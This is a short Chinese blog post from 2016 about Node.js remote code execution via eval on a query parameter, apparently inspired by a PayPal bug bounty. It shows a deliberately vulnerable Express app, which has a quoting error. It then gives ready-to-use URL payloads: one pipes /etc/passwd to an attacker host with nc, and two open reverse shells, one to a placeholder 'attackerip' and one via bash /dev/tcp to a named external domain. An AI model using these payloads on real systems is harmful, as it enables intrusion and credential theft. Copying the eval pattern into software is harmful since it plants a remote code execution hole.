NodeJS远程代码执行
更新时间:2016年08月28日 15:30:03 投稿:hebedich
这篇文章主要介绍了NodeJS远程代码执行方法的相关资料,需要的朋友可以参考下
背景
@Artsploit在挖PayPal的漏洞时,发现一处NodeJS代码执行,奖励$10000美金。
测试
var express = require('express'); var app = express(); app.get('/', function (req, res) { res.send('Hello eval(req.query.q)); console.log(req.query.q); }); app.listen(8080, function () { console.log('Example listening on port 8080!'); });
任意文件读取
http://host:8080/?q=require('child_process').exec('cat+/etc/passwd+|+nc+attackerip+80')
GET SHELL
http://host:8080/?q=var+net+=+require("net"),+sh+=+require("child_process").exec("/bin/bash");var+client+=+new+net.Socket();client.connect(80,+"attackerip",+function(){client.pipe(sh.stdin);sh.stdout.pipe(client);sh.stderr.pipe(client);});
GET SHELL2
http://host:8080/?q=require("child_process").exec('bash -c "bash -i >%26 /dev/tcp/wufeifei.com/7890 0>%261"')
相关文章
Node Mongoose用法详解【Mongoose使用、Schema、对象、model文档等】
这篇文章主要介绍了Node Mongoose用法,结合实例形式分析了Mongoose使用、Schema、对象、model文档等基本原理、用法及操作注意事项,需要的朋友可以参考下2020-05-05node.js使用npm 安装插件时提示install Error: ENOENT报错的解决方法
这篇文章主要介绍了node.js使用npm 安装插件时提示install Error: ENOENT报错的解决方法,需要的朋友可以参考下2014-11-11
最新评论